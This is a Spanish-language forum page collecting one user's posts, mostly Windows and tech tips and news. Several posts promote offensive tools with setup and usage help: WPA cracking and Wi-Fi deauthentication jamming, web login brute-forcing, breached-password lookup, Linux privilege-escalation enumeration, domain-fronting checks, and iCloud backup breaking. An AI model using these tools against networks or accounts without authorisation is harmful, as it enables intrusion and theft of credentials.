Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Gold Master

#1
WiFiBroot
Una herramienta WiFi-Pentest-Cracking para WPA / WPA2 (Handshake, PMKID, Offline Cracking, EAPOLS, Deauthentication Attack).

WiFiBroot está diseñado para proporcionar a los clientes instalaciones todo en uno para interceptar redes WiFi (WPA / WPA2). Depende en gran medida de  scapy , una biblioteca de manipulación de paquetes bien caracterizada en Python. Casi todos los procesos internos dependen de alguna manera de las capas de scapy y otras funciones, excepto para operar la interfaz inalámbrica en un canal diferente. Eso se hará a través del comando nativo de Linux  iwconfig  para el que quizás necesite   privilegios de sudo . Actualmente proporciona  cuatro Modos de trabajo independientes para tratar con las redes objetivo. Dos de ellos son métodos de craqueo en línea mientras que el otro se ejecuta en modo fuera de línea. El modo sin conexión se proporciona para romper hashes guardados de los dos primeros modos. Uno es para el ataque de autenticación en la red inalámbrica y también se puede utilizar como un manejador de interferencias. Puede ejecutarse en una variedad de plataformas Linux y al menos requiere WN727N de tp-link para funcionar correctamente.



Instalación:
Código: text
git clone https://github.com/hash3liZer/WiFiBroot.git 
sudo pip install scapy


Utilizar:
WiFiBroot usa modos para identificar qué ataque quieres realizar en tu objetivo. Actualmente, hay tres modos disponibles. El uso de cada modo se puede ver proporcionando la   opción –help / -h justo después de la   opción -m / –mode . Aquí hay una lista de los modos disponibles y lo que hacen:

Modos:
Código: text
Syntax:
    $ python wifibroot.py [--mode [modes]] [--options]
    $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt

Modes:
    #     Description                                 Value
    01    Capture 4-way handshake and crack MIC code    1
    02    Captures and Crack PMKID (PMKID Attack)       2
    03    Perform Manaul cracking on available
          capture types. See --list-types               3
    04    Deauthentication. Disconnect two stations
          and jam the traffic.                          4

Use -h, --help after -m, --mode to get help on modes.


Cada modo tiene un propósito específico y tiene sus propias opciones:

APRETÓN DE MANOS:
Código: text
Mode: 
   01      Capture 4-way handshake and crack MIC code    1

Options:
   Args               Description                      Required
   -h, --help         Show this help manual              NO
   -i, --interface    Monitor Interface to use           YES
   -v, --verbose      Verbose Mode. Detail help          NO
   -t, --timeout      Time Delay between two deauth
                      requests.                          NO
   -d, --dictionary   Dictionary for Cracking            YES
   -w, --write        Write Captured handshake to
                      a seperate file                    NO
       --deauth       Number of Deauthentication
                      frames to send                     NO

Filters:
   -e, --essid         ESSID of listening network
   -b, --bssid         BSSID of target network.
   -c, --channel       Channel interface should be listening
                       on. Default: ALL


Ataque de PMKID
Código: text
Mode: 
   02      Captures and Crack PMKID (PMKID Attack)       1

Options:
   Args               Description                      Required
   -h, --help         Show this help manual              NO
   -i, --interface    Monitor Interface to use           YES
   -v, --verbose      Verbose Mode. Detail help          NO
   -d, --dictionary   Dictionary for Cracking            YES
   -w, --write        Write Captured handshake to
                      a seperate file                    NO

Filters:
   -e, --essid         ESSID of listening network
   -b, --bssid         BSSID of target network.
   -c, --channel       Channel interface should be listening
                       on. Default: ALL


Cracking fuera de línea
Código: text
Mode: 
   03    Perform Manaul cracking on available capture
         types. See --list-types                         3

Options:
   Args               Description                      Required
   -h, --help         Show this help manual              NO
       --list-types   List available cracking types      NO
       --type         Type of capture to crack           YES
   -v, --verbose      Verbose Mode. Detail help          NO
   -d, --dictionary   Dictionary for Cracking            YES
   -e, --essid        ESSID of target network.
                      Only for HANDSHAKE Type            YES
   -r, --read         Captured file to crack             YES


DEAUTHENTICATION ATTACK (Pruebas de estrés)
Código: text
Mode:
    04   Deauthentication. Disconnect two stations
         and jam the traffic.                            4

Options:
    Args              Description                      Required
    -h, --help        Show this help manual              NO
    -i, --interface   Monitor Mode Interface to use      YES
    -0, --count       Number of Deauthentication
                      frames to send. '0' specifies
                      unlimited frames                   YES
        --ap          Access Point MAC Address           NO
        --client      STA (Station) MAC Address          NO


Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2
En esta ocasión les traigo un post para que pueda instalar controladores o programas que son para otras versiones de Windows.

Aplicable o funcional en las siguientes versiones de Windows:

Windows Vista
Windows 7
Windows 8
Windows 8.1
Windows 10

De clic derecho sobre el programa ó controlador y seleccione Propiedades / en la parte superior de la venta vaya a Compatibilidad  y en donde dice Ejecutar este programa en modo compatibilidad de clic y ahora  seleccione la versión de Windows que tiene en su equipo, por ultimo de clic en Aplicar y Aceptar.

Instrucciones en modo gráfico:

#3

Desde hace tiempo, Windows tiene una carpeta llamada Temp en la que se van acumulando los archivos temporales del sistema, algo que puede llegar a ocupar bastante espacio en el disco duro. Hasta hace poco había que eliminar estos archivos temporales de forma manual, aunque en las últimas versiones han implementado una función para automatizar el proceso.

Y eso es precisamente lo que vamos a explicarte hoy. Te vamos a explicar paso a paso cómo y por qué borrar automáticamente los archivos temporales de Windows 10, mencionando primero qué son y por qué puedes querer borrarlos, y después el método para automatizar su borrado periódico.

Por qué borrar los archivos temporales de Windows
La principal razón por la que borrar este tipo de archivos es la de ahorrar espacio en el disco duro de tu ordenador. Aunque estos archivos se crean para realizar operaciones concretas, con el paso del tiempo se acaban acumulando sin que tengan especiales utilidades. Y de ahí que si andas mal de almacenamiento borrarlos sea uno de los primeros pasos a dar.

Como te decíamos al principio, Windows 10 tiene, como las versiones anteriores, una carpeta llamada Temp en la que acumula los archivos temporales del sistema. Muchas de las aplicaciones que utilizan crean este tipo de archivos para controlar la edición y el avance de sus usuarios. Estos archivos, por poner un ejemplo, hacen que puedas deshacer ediciones en Word, Excel o cualquier otra aplicación de forma instantánea, puesto que guardan versiones anteriores de los documentos.

Otras aplicaciones también crean archivos temporales para dejar espacio a otras que puedas estar utilizando, e incluso cuando vas a imprimir un archivo se crea una versión temporal de este archivo. En definitiva, estos archivos temporales son los que permiten tener diferentes versiones de un mismo documento o archivo que estés editando, desde uno de texto hasta los audiovisuales.

De la misma manera, cuando estás navegando en Internet tu navegador también crea archivos temporales. Estos elementos son todas las imágenes y datos que se almacenan en tu ordenador (o cualquier otro dispositivo) cuando estás navegando por la red, algo que tu navegador hace para que la próxima vez que visites una página esta cargue de forma más rápida.

Por lo tanto, el único problema que puedes tener al eliminar archivos temporales de tu ordenador es la de perder versiones sin guardar de documentos, algo que no causa problemas si guardas siempre al terminar, o que determinadas aplicaciones como tu navegador tarden un poco más la primera vez que visitan páginas o realizan tareas para las que necesitan temporales. Pero a cambio, habrás borrado muchos otros archivos que tu ordenador ya no utiliza.

Cómo borrar automáticamente los archivos temporales.




En el pasado ya te hemos enseñado a borrar manualmente los archivos temporales de tu ordenador. Pero ahora Windows 10 te permite configurar un borrado automático periódico. Para ello, abre la Configuración de Windows, y en ella pulsa en la opción Sistema.



Una vez entres en la sección Sistema de la Configuración de Windows, pulsa en la categoría Almacenamiento (1) que verás en la columna de la izquierda. Cuando estés en ella, ahora activa la opción Sensor de almacenamiento (2).



Con esta opción, habrás activado la eliminación periódica automática de archivos temporales de Windows y los que tienes en la papelera de reciclaje. Sin embargo, para tener todo el control de cómo se eliminan estos archivos ahora pulsa en la opción Cambiar el modo de liberar espacio automáticamente que aparece justo debajo del botón de activación.



Una vez dentro de Cambiar el modo de liberar espacio automáticamente, tienes que elegir la frecuencia en la que quieres que se eliminen los archivos temporales. Por defecto estarán configurados para liberarse cuando haya poco espacio, pero puedes establecer una frecuencia diaria, semanal o mensual.



Justo debajo, activa la opción Elimina los archivos temporales que mis aplicaciones no usan para que Windows detecte los que están sin uso y los elimine. En esta misma sección también puedes establecer el borrado automático de los archivos de la papelera de reciclaje o los de la carpeta Mis descargas.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#4
Hola a tod@s, espero que la siguiente información e instrucciones puedan servir en sus equipos que fueron diseñados para el almacenamiento en la nube o unidades externas, con esto quiero decir que es aplicable para equipos que no cuentan con unidades de almacenamientos de mucha capacidad y que ademas están integrados.

Windows 10 es el nuevo sistema operativo de Microsoft lanzado hace ya un año. Este sistema operativo llegó con importantes mejoras y muchas novedades respecto a su predecesor, algunas de ellas pueden apreciarse a simple vista, aunque donde más cambios se han realizado ha sido a nivel interno, tanto en el funcionamiento y la optimización de recursos como en muchas características incluidas en el sistema y que, por lo general, son desconocidas para la mayoría. Una de estas características ocultas y desconocidas es Compact OS.

Compact OS es una nueva herramienta desarrollada por Microsoft que nos va a permitir comprimir los binarios del propio sistema operativo sin alterar los datos del usuario de manera que podamos ahorrar algunos gigas de espacio en el disco duro. Gracias a la potencia de los procesadores actuales, esta función no repercute en el rendimiento del sistema operativo más que unas milésimas de segundo, algo inapreciable.

Por defecto, esta función está desactivada, por lo que, para poder utilizarla, debemos activarla manualmente a través de los correspondientes comandos de CMD.

Cómo comprobar el estado de Compact OS en Windows 10
Antes de proceder a activar esta función debemos comprobar si ya la tenemos activada o no. Para ello, simplemente debemos abrir una ventana de CMD y ejecutar en ella el siguiente comando:

Código: text
compact.exe /q


El programa nos mostrará un resumen con la relación de compresión.


Si esta relación es 1.0 o está demasiado cerca de 1 es posible que Compact OS no esté activado, en cuyo caso podemos activarlo para ahorrar espacio siguiendo los pasos que vamos a ver a continuación. Aunque el proceso es seguro, siempre se recomienda hacer una copia de seguridad de los datos antes de continuar, por lo que pueda pasar.

Cómo activar la compresión de Compact OS
Para activar esta función de compresión de binarios, lo primero que debemos hacer es ejecutar una ventana de CMD con permisos de administrador (buscamos CMD en Cortana y lo ejecutamos utilizando la función "Ejecutar como Administrador" que al pulsar con el botón derecho).

Una vez en la ventana de CMD ejecutamos el siguiente comando:
Código: text
compact.exe /CompactOS:always


El programa empezará a comprimir los binarios del sistema operativo. Este proceso puede tardar bastante tiempo (incluso más de 20 minutos), por lo que debemos esperar a que finalice.


Una vez finalice el proceso veremos el nuevo ratio de compresión y volvemos a comprobar el espacio de nuestro disco duro, donde podremos ver que ahora tenemos, al menos, dos o tres gigabytes menos ocupados, algo irrelevante para muchos pero un espacio preciado para los usuarios que utilizan unidades SSD de poca capacidad.





Cómo desactivar la compresión de Compact OS
En el caso de detectar algún problema, o simplemente porque nos sobran los gigas, esta función puede desactivarse fácilmente. Para ello, una vez más desde la ventana de administrador de CMD ejecutaremos el siguiente comando.
Código: text
compact.exe /CompactOS:never


Esperaremos a que finalicen las tareas correspondientes y, automáticamente, nuestro sistema ya no estará más compactado, pudiendo comprobar que, efectivamente, vuelve a ocupar más espacio en el disco duro.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#5


0d1n es una herramienta para automatizar ataques personalizados contra aplicaciones web.

Tu puedes hacer:


Fuerza bruta de inicio de sesión y contraseñas en formularios de autenticación.
Divulgación del directorio (use la lista PATH para brute y busque el código de estado HTTP)
Prueba para encontrar vulnerabilidades de inyección SQL y XSS.
Opciones para cargar el token ANTI-CSRF de cada solicitud
Opciones para usar proxy aleatorio por solicitud
Otras funciones...

Versiones anteriores:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Para ejecutar:


requiera libcurl-dev o libcurl-devel (basadoen rpm linux )
$ git clone No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
necesita libcurl para ejecutar
$ sudo apt-get install libcurl-dev
si rpm distro
$ sudo yum install libcurl-devel
$ make
$. / 0d1n
Lea la documentación

Descargar 0D1N: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#6
pwnedOrNot v1.1.7 – Herramienta OSINT para buscar contraseñas para direcciones de correo electrónico comprometidas



pwnedOrNot usa la API v2 de haveibeenpwned para probar las cuentas de correo electrónico e intenta encontrar la contraseña en los volcados de Pastebin .

Las características que han sido publicadas ofrecen una gran cantidad de información sobre el correo electrónico comprometido, este script muestra cierta información útil:
Nombre de incumplimiento
Nombre de dominio
Fecha de incumplimiento
Estado de fabricación
Estado de verificación
Estado de jubilación
Estado de spam
Y con toda esta información pwnedOrNot puede encontrar fácilmente contraseñas para correos electrónicos comprometidos si el volcado es accesible y contiene la contraseña

Probado en

Kali Linux 18.2
Ubuntu 18.04
Kali Nethunter
Termux

Instalación
Ubuntu / Kali Linux / Nethunter / Termux

Código: text
chmod 777 install.sh
./install.sh




Uso


Código: text
python3 pwnedornot.py -h

usage: pwnedornot.py [-h] [-e EMAIL] [-f FILE] [-d DOMAIN] [-n] [-l]
                     [-c CHECK]

optional arguments:
  -h, --help                  show this help message and exit
  -e EMAIL, --email EMAIL     Email Address You Want to Test
  -f FILE, --file FILE        Load a File with Multiple Email Addresses
  -d DOMAIN, --domain DOMAIN  Filter Results by Domain Name
  -n, --nodumps               Only Check Breach Info and Skip Password Dumps
  -l, --list                  Get List of all pwned Domains
  -c CHECK, --check CHECK     Check if your Domain is pwned

# Examples

# Check Single Email
python3 pwnedornot.py -e <email>
#OR
python3 pwnedornot.py --email <email>

# Check Multiple Emails from File
python3 pwnedornot.py -f <file name>
#   OR
python3 pwnedornot.py --file <file name>

# Filter Result for a Domain Name [Ex : adobe.com]
python3 pwnedornot.py -e <email> -d <domain name>
#OR
python3 pwnedornot.py -f <file name> --domain <domain name>

# Get only Breach Info, Skip Password Dumps
python3 pwnedornot.py -e <email> -n
#OR
python3 pwnedornot.py -f <file name> --nodumps

# Get List of all Breached Domains
python3 pwnedornot.py -l
#OR
python3 pwnedornot.py --list

# Check if a Domain is Pwned
python3 pwnedornot.py -c <domain name>
#OR
python3 pwnedornot.py --check <domain name>




Manifestación


Descargar pwnedOrNot: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#7
linux-smart-enumeration: herramientas de enumeración de Linux para pentesting y CTFs

linux-smart-enumeration
Herramientas de enumeración de Linux para pentesting y CTFs.

Este proyecto fue inspirado por LinEnum y utiliza muchas de sus pruebas.

A diferencia de LinEnum,  lse  intenta exponer gradualmente la información en función de su importancia desde un punto de vista particular.


Esta secuencia de comandos mostrará información relevante sobre la seguridad del sistema Linux local.

Tiene 3 niveles de verbosidad para que pueda controlar cuánta información ve.

En el nivel predeterminado, debería ver las fallas de seguridad muy importantes en el sistema. El nivel  1 (./lse.sh -l1 ) muestra información interesante que debería ayudarlo a privesc. El nivel 2 (./lse.sh -l2) simplemente volcarátoda la información que recopila sobre el sistema.

Por defecto, le hará algunas preguntas: principalmente la contraseña de usuario actual (si la conoce, para que pueda realizar algunas pruebas adicionales).

Descargar
git clone No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Utilizar
Código: text
Use: ./lse.sh [options]

OPTIONS
   -c           Disable color
   -i           Non interactive mode
   -h           This help
   -l LEVEL     Output verbosity level
                  0: Show highly important results. (default)
                  1: Show interesting results.
                  2: Show all gathered information.
   -s SELECTION Comma separated list of sections or tests to run. Available
                sections:
                  usr: User related tests.
                  sud: Sudo related tests.
                  fst: File system related tests.
                  sys: System related tests.
                  sec: Security measures related tests.
                  ret: Recurren tasks (cron, timers) related tests.
                  net: Network related tests.
                  srv: Services related tests.
                  pro: Processes related tests.
                  sof: Software related tests.
                  ctn: Container (docker, lxc) related tests.
                Specific tests can be used with their IDs (i.e.: usr020,sud)


La idea es obtener la información gradualmente.

Primero, debes ejecutarlo como  ./lse.sh . Si ves algo verde  sí! , probablemente ya tengas algunas cosas buenas con las que trabajar.

De lo contrario, debe probar el  nivel de  verbosidad 1 con  ./lse.sh -l1  y verá más información que puede ser interesante.

Si eso no ayuda, el  nivel 2  simplemente eliminará todo lo que pueda reunir sobre el servicio utilizando  ./lse.sh -l2. En este caso, puede ser útil utilizar  ./lse.sh -l2 | menos -r .

También puede seleccionar qué pruebas ejecutar al pasar el   parámetro -s . Con él, puede seleccionar pruebas o secciones específicas para ser ejecutadas. Por ejemplo  ./lse.sh -l2 -s usr010, net, pro  ejecutará la prueba  usr010 y todas las pruebas en las secciones  net  y  pro .

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#8


Por cuestión de idioma o por problemas de sonido ambiente, te será muy práctico activar los subtítulos en directo de Skype.

Aunque con Skype y una buena conexión a Internet puedes mantener conversaciones de calidad con vídeo y audio o solamente con sonido, por varias razones podrías necesitar una ayuda extra para entender lo que está diciendo tu interlocutor.

Skype cuenta con una función de subtitulado de llamadas y videollamadas que funciona en tiempo real, durante la conversación. Su propósito es entender lo que está diciendo tu interlocutor aunque no puedas escucharle.

Esta opción está disponible en la mayoría de versiones de Skype, es decir en Skype para Android, iPhone, iPad, Windows, Mac, Linux y Windows 10. Además, subtitula varios idiomas, entre los que incluye español, francés, alemán, inglés (británico y americano), italiano, japonés, portugués, ruso y chino (tradicional y simplificado).



Activar los subtítulos en directo
Mientras mantenemos una llamada de audio o videollamada en Skype, podemos activar los subtítulos en directo desde el botón Más y luego pulsando en Activar subtítulos.

Si no ves esta opción es por dos razones: no tienes la versión más actualizada de Skype o no tienes Skype en uno de los idiomas mencionados arriba.

Para desactivarlos, sólo tienes que volver a Más y seleccionar Desactivar subtítulos.

Si en vez de activar los subtítulos manualmente quieres que estén disponibles en cada llamada o videollamada, deberás acudir a Configuración de Skype y luego a Llamadas > Subtítulos de llamada. Finalmente, activamos la opción Mostrar subtítulos para todas las llamadas de voz y videollamadas.

Opcionalmente es posible activar también la opción Mostrar solo subtítulos para otros participantes.

Cambiar el idioma de los subtítulos
Desde Configuración > Llamadas > Subtítulos de llamada es posible definir en qué idioma queremos los subtítulos. Por defecto, el idioma de subtitulado será el mismo de Skype, pero si mantienes llamadas o videollamadas en otro idioma, es más útil indicar ese idioma para que el subtitulado sea correcto y no se produzcan errores de transcripción.

Podrás elegir entre español, francés, alemán, inglés (británico y americano), italiano, japonés, portugués, ruso y chino (tradicional y simplificado).

No está de más recordar que los subtítulos en directo de Skype sirven para escribir lo que se está diciendo, no para traducirlo de un idioma a otro. Quién sabe si está opción llegará en el futuro, algo nada descabellado teniendo en cuenta que PowerPoint tiene una opción de traducción y subtitulado en tiempo real.

Mientras, puedes emplear Skype Translator, una función que permite traducir lo que escribes y reproducirlo en otro idioma con una voz femenina o masculina. Por su parte, lo que dice tu interlocutor se traduce también en mensajes de texto.

Esta función está limitada a una conversación entre dos personas, es compatible con más de 50 idiomas por escrito y para llamadas y videollamadas, es compatible con árabe, chino, inglés, francés, alemán, hindi, italiano, japonés, portugués, ruso y, cómo no, español.

Por ahora, Skype Translator está disponible para Windows y Windows 10. Encontrarás más información en su página de ayuda.

Pagina de ayuda: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia:No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#9
Hacking / ¿Hackeamos iCloud?
Abril 14, 2019, 02:48:49 PM
En esta ocasión les traigo una herramienta para poder romper iCloud, existen varias formas, la herramienta se llama: elcomsoft phone breaker.



Muy divertida, facil de usar, literalmente es darle el botonazo, esta herramienta puede:
Recupera las copias de respaldo de Blackberry y Apple protegidas por contraseñas
Recupera las copias de respaldo en la nube: Apple iCloud y Windows Live
Autentificación doble
Acceso a iCloud sin inicio de sesión y contraseña
Archivos de iCloud
Desbloque de copias de seguridad Apple y BlackBerr
Descifrado de copias de respaldo BlackBerry 10
Acceso selectivo a copias de seguridad de iCloud
Extraer y descifrar las contraseñas almacenadas

Entre muchas otras cosas, obviamente la herramienta cuesta, decide tu si la quieres comprar, obviamente no la recomendamos crackeada, ya será tu decisión.

Te dejo la URL: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#10
Hacking / Chkdfront – Revisar Dominio Delantero
Abril 12, 2019, 04:29:23 PM


chkdfront comprueba si su dominio al frente está funcionando al probar el dominio apuntado (dominio al frente) contra su dominio de dominio frontal.

Caracteristicas


Comprobando su dominio frente al frente de dominio.
Buscando una cadena esperada en la respuesta para indicar el éxito.
Mostrar sugerencias de solución de problemas cuando falla una prueba basada en la falla natural.
Inspeccionar la solicitud y respuesta HTTP cuando falla una prueba. (opcionalmente si tiene éxito).
Solución de problemas con varias verificaciones (ping, HTTP, nslookup) cuando falla una prueba. (opcionalmente si tiene éxito).
Pruebas de apoyo a través de proxy.

Demostración

Consulte la demostración: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Instalación
Código: text
$ gem install chkdfront


Uso
Código: text
Help menu:
    -f, --front-target URL           Fronted target domain or URL.
                                      e.g. images.businessweek.com
    -d, --domain-front DOMAIN        DomainFront domain.
                                      e.g. df36z1umwj2fze.cloudfront.net
    -e, --expect STRING              Expect a given string that indicates success. (case-sensitive)
                                      e.g. It works
    -p, --provider NUM               Choose CDN / Domain Front Provider:
                                      [0] Auto    (default - auto tune request. Extra request to detect)
                                      [1] Amazon  (tune request for Amazon domain fronting)
                                      [2] Azure   (tune request for Azure domain fronting)
                                      [3] Alibaba (tune request for Alibaba domain fronting)
    -t, --troubleshoot [DOMAIN]      Force troubleshooting procedures.
                                     execute troubleshooting procedures(ping, http, nslookup) for all parties
                                     (optional: original domain where CDN forwards, to include in the checks)
                                      e.g. c2.mydomain.com
        --proxy USER:PASS@HOST:PORT  Use proxy settings if you're behind proxy.
                                      e.g. user1:Pass123@localhost:8080
        --debug                      Force debugging.
                                     show response's body and low-level request and response debug trace.
                                     (default enabled when test fails.)
    -h, --help                       Show this message.

Usage:
  /   usr/local/bin/chkdfront <OPTIONS>
Example:
  /usr/local/bin/chkdfront -f images.businessweek.com -d df36z1umwj2fze.cloudfront.net
  /usr/local/bin/chkdfront -f images.businessweek.com -d df36z1umwj2fze.cloudfront.net --debug -t c2.mysite.com


Contribuyendo

Bifurque ( No tienes permitido ver enlaces. Registrate o Entra a tu cuenta )
Crea tu rama de características (git checkout -b my-new-feature)
Confirma tus cambios (git commit -am 'Agregar alguna característica')
Push to the branch (git push origin my-new-feature)
Crear una nueva solicitud de extracción

Descargar Chkdfront: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#11


Mozilla está preparando un programa de extensiones recomendadas para Firefox, que está diseñado para aumentar la seguridad de estas piezas de software y la calidad de las mismas en el navegador web libre. Estará disponible el próximo verano.

Las extensiones se han vuelto inmensamente populares como un complemento que amplía las funcionalidades del navegador. Todos los desarrollos principales cuentan con miles de ellas. Algunas son -casi- imprescindibles para muchos usuarios al ampliar el potencial del navegador, aumentar sus características o permitir distintas personalizaciones.

Sin embargo, no todo es positivo en estas pequeñas piezas de software. Muchas no tienen la calidad suficiente, son redundantes, pueden afectar a la seguridad porque son una vía de entrada preferente para el malware y dependiendo del número que tengamos instalado y sus características, pueden afectar al rendimiento y la estabilidad del propio navegador.

De ahí la importancia de estas extensiones recomendadas para Firefox, que pasarán por un proceso de investigación riguroso en Mozilla antes de añadirlas a un programa que evaluará aspectos cómo:

¿Es la extensión realmente buena en lo que hace?
¿La extensión ofrece una experiencia de usuario excepcional?
¿Es la extensión relevante para una audiencia general?
¿Es segura la extensión?
Mozilla preparará un listado inicial de estas extensiones y los usuarios también podrán sugerir otras alternativas. En todos los casos se buscará el compromiso de los desarrolladores en un desarrollo activo y la voluntad de hacer mejoras. Todas las incluidas, incluyendo las sucesivas actualizaciones, pasarán por un proceso de revisión de Mozilla.

Las seleccionadas recibirán una mejor visibilidad en los sitios web y productos de Mozilla, incluido en en el portal general  No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (AMO). Serán identificables visualmente con varios distintivos y los resultados de búsqueda de AMO y el filtrado se ponderarán hacia las extensiones recomendadas. También estarán mejor situadas en el administrador de complementos del navegador.

Interesante. El usuario podrá seguir instalando las extensiones que prefiera, pero el programa de extensiones recomendadas para Firefox es una buena idea para mejorar la seguridad y calidad del navegador. Estará disponible el próximo verano.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#12


El navegador Microsoft Edge Chromium ya se había filtrado anteriormente a través de fuentes no oficiales, una situación que apuntaba a un lanzamiento inminente. No andábamos desencaminados, hoy el gigante de Redmond ha liberado la versión previa de dicho navegador de forma general, aunque con un pequeño requisito, y es que tenemos que participar en el canal Microsoft Edge Insider.

Resulta curioso pero es cierto, Microsoft tiene un canal Insider para la mayoría de sus soluciones de software, y su nuevo navegador no ha sido una excepción. Esto confirma que van muy en serio, y que han hecho una apuesta muy importante con la que esperan poder plantar cara a Google Chrome, un navegador que se ha mantenido desde hace años como el gran rival a batir dentro del sector.

Como hemos comentado estamos ante una versión previa de Microsoft Edge Chromium, lo que significa que todavía puede recibir cambios de cara a su versión definitiva, aunque no creemos que vaya a presentar modificaciones importantes a nivel de interfaz ni de características básicas. Dicho esto debemos hablar de las tres grandes opciones que encontraréis en el canal Insider si os decidís a probar este nuevo navegador: Canary, Dev y Beta.




El navegador Microsoft Edge Chromium ya se había filtrado anteriormente a través de fuentes no oficiales, una situación que apuntaba a un lanzamiento inminente. No andábamos desencaminados, hoy el gigante de Redmond ha liberado la versión previa de dicho navegador de forma general, aunque con un pequeño requisito, y es que tenemos que participar en el canal Microsoft Edge Insider.

Resulta curioso pero es cierto, Microsoft tiene un canal Insider para la mayoría de sus soluciones de software, y su nuevo navegador no ha sido una excepción. Esto confirma que van muy en serio, y que han hecho una apuesta muy importante con la que esperan poder plantar cara a Google Chrome, un navegador que se ha mantenido desde hace años como el gran rival a batir dentro del sector.

Como hemos comentado estamos ante una versión previa de Microsoft Edge Chromium, lo que significa que todavía puede recibir cambios de cara a su versión definitiva, aunque no creemos que vaya a presentar modificaciones importantes a nivel de interfaz ni de características básicas. Dicho esto debemos hablar de las tres grandes opciones que encontraréis en el canal Insider si os decidís a probar este nuevo navegador: Canary, Dev y Beta.



La imagen que acompañamos explica a la perfección las diferencias que existen entre cada opción, pero os dejamos un resumen simplificado para que no tengáis dudas:

El canal Canary es lo que podríamos considerar como el "Skip Ahead" del programa Insider de Windows 10, ya que se caracteriza por recibir actualizaciones a diario. Esto significa que será el primero en recibir las novedades, pero éstas podrían no ser del todo estables.
Por contra el canal Dev podríamos definirlo como el anillo rápido. Recibe actualizaciones cada semana y éstas han sido probadas por el equipo de Microsoft, así que son, generalmente, versiones más estables que las que encontramos en el canal Canary.
Finalmente tenemos el canal Beta, que sería el equivalente al anillo lento. Todavía no está disponible, promete actualizaciones totalmente estableces cada seis semanas.
De momento solo podemos disfrutar de Microsoft Edge Chromium bajo Windows 10, pero esperamos que la versión final de dicho navegador llegue también a Windows 7, Windowsd 8.1 y macOS.

Si queréis daros de alta en el programa Microsoft Edge Insider solo tenéis que entrar en este enlace, seleccionar el canal y seguir los pasos del proceso autoguiado.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#13


El sistema permite la integración con varios proveedores. Ya está disponible en fase beta.

CitarGoogle presentó Anthos, una plataforma que permite conectar nubes de diferentes proveedores.

Google anunció el lanzamiento de su plataforma de nube híbrida Anthos. El sistema, que permite adoptar una infraestructura de nube pública con varios proveedores, ya está disponible en fase beta para todos los clientes.

Además de funcionar con Google Cloud, también lo hace con servicios de otras compañías como Azure de Microsoft o AWS de Amazon. Integra la herramienta Anthos Migrate que facilita la migración entre nubes.

La idea es que se pueda combinar datos y aplicaciones que se encuentran dentro de su infraestructura, haciendo uso de nubes públicas de diferentes compañías.

"La posibilidad de usar varias nubes de forma sencilla e integrada con los sistemas existentes, representa una gran oportunidad en el mercado, que permitirá a las empresas estar más cerca de un mundo en el que se pueda inscribir una aplicación una sola vez y su código pueda funcionar en cualquier lugar", dijo João Bolonha, director de Google Cloud para América Latina.


CitarEl anuncio se hizo en el marco de Google Cloud Next que se lleva a cabo, hasta el jueves, en San Francisco.

Cloud Run

Se trata de una nueva plataforma que permite ejecutar contenedores sin la necesidad de tener que acceder a un servidor. La plataforma aumenta o disminuye automáticamente su tamaño en función del tráfico. De ese modo, el cliente termina pagando solamente por los recursos que realmente utiliza.

Está basado en Knative, una API abierta. Se pueden ejecutar las cargas de trabajo desde un cluster propio, en uno autogestionado de Kubernetes o Google Cloud Platform.

Tal como ocurre con Anthos, Cloud Run permitirá a los clientes utilizar su propia infraestructura combinada con nubes de otros proveedores.

Además de estos anuncios, Google anunció que Cloud estará disponible en dos nuevas regiones a partir del primer trimestre de 2020: la primera será en Seúl, Corea del Sur y, la segunda, Salt Lake City, Estados Unidos.

Esto se suma al desembarco en Osaka, Japón, que ocurrirá en las próximas semanas y Yakarta, Indonesia, donde el servicio estará disponible en el primer trimestre de 2020.

Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#14


Google permitirá que nuestro smartphone Android sirva como llave de seguridad física para proteger nuestros inicios de sesión

A mediados del año pasado, Google dio a conocer que durante 2017 todos y cada uno de sus 85.000 empleados no habían sido víctimas de phishing. ¿Cómo lograron esto? Haciendo que el uso de llaves físicas USB, o 'Security Keys', fuese obligatorio. Debido a este éxito, a los pocos meses Google puso a la venta sus propias llaves de seguridad, las Titan Security Keys. Y hoy, está habilitando la opción para que un móvil Android actué como una de estas llaves de seguridad.

Hoy día, el método de autenticación de dos pasos (2FA) es una de las formas más eficaces que tenemos para mantener seguros nuestros accesos a diversos servicios en línea. Sin embargo, no es perfecto y ya ha mostrado en más de una ocasión que su uso a través de SMS es relativamente sencillo de vulnerar. Ahora, con sólo tener un smartphone Android podremos habilitar la 2FA de forma física para mayor seguridad.

Una forma avanzada de autenticación de dos pasos directo en nuestro Android
A pesar de que las llaves de seguridad son relativamente económicas y fáciles de conseguir, mucha gente sigue sin usarlas como método de autenticación de dos pasos, lo que deja en riesgo su información. Google asegura que quiere terminar con esta tendencia al usar nuestro smartphone, que siempre está con nosotros, como método de autenticación y esperar a que esto se masifique.

